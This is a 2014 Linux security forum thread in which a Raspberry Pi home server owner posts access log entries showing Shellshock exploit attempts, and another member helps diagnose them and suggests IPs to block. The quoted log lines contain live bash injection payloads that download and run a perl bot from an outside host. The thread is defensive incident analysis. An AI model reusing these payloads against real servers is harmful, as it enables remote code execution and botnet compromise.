LinuxQuestions.org
Welcome to the most active Linux Forum on the web.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 09-30-2014, 12:40 AM   #1
2damncommon
Senior Member
 
Registered: Feb 2003
Location: Calif, USA
Distribution: PCLINUXOS
Posts: 2,918

Rep: Reputation: 103Reputation: 103
RasPi Homeserver Bash Attack


I am starting to see Bash attack on my Raspberry Pi homeserver.

Code:
173.45.100.18___"GET /cgi-bin/hi HTTP/1.0" 404 489 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
82.221.128.246___"GET / HTTP/1.1" 200 596 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
54.251.83.67___"GET / HTTP/1.1" 200 596 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
Those are all in a row.

Other knowing these are 200 rather than 404 I don't know what to make of it.

Do I unplug the server?

EDIT:
bash-count.txt says this:
This server is used for Internet security scans.
We are collecting data purely for research purposes and do
not mean to do any harm.


If you wish to opt out and make sure that we don't scan your
IP range again, please send us an email, and we will promptly
do so.


1. Send us an email with an IP range and organization name
E-mail to secscanoptout@gmail.com

173.45.100.18 = Columbus, Ohio
82.221.128.246 = Reykjavik, Hofuoborgarvaoio, Iceland (I have a Windows Virtual Machine running F-Prot AV ???)
54.251.83.67 = Singapore

Last edited by 2damncommon; 09-30-2014 at 01:00 AM. Reason: Additional info
 
Old 09-30-2014, 04:27 AM   #2
Habitual
LQ Veteran
 
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Blog Entries: 37

Rep: Reputation: Disabled
Have a look at http://www.linuxquestions.org/questi...gs-4175520321/

if you haven't rebooted, run this
Code:
ps -p $(pidof atd) -o lstart | tail -1 && last reboot | head -1
if atd has been running since about the time of the last reboot, I'd say your safe from the jurat perbot

wget http://213.5.67.223/ji is another perlbot and it appears to connect (or try to connect) to ircd.w3h.co.uk

You should check your /usr/sbin/httpd and /usr/sbin/atd binaries for anything amiss.

jurat has been removed, probably after detection, so I can examine it anymore. but still exists here...

I would block 46.16.170.158, 68.235.41.115, 213.5.67.223 and I've seen bash-count.txt on my own server, I think it's the initial test of the target system for potentiality compromise, but that's just my opinion. I'm no unSpawn when it comes to these things.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
what knowledge is needed for setting up a good homeserver? plusminus1 Linux - Newbie 5 11-20-2012 05:49 PM
[SOLVED] Debian homeserver dual networking problems. KillerWee Linux - Networking 4 02-27-2011 12:58 PM
I hope Linux will solve my homeserver needs marquisor LinuxQuestions.org Member Intro 1 09-28-2010 09:21 AM
LXer: When Features Attack: Bash Version 4.0.0(1)-rc1 LXer Syndicated Linux News 0 02-12-2009 06:50 AM
Howto enable php scipts to run only for certain website on homeserver firedancer Linux - Server 12 11-09-2007 12:07 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 03:21 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration